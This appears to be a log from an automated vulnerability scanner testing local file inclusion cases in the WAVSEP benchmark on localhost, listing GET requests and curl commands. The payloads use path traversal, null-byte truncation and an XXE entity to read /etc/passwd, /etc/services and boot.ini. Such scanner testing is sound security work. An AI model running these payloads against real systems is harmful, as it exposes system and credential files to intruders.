curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
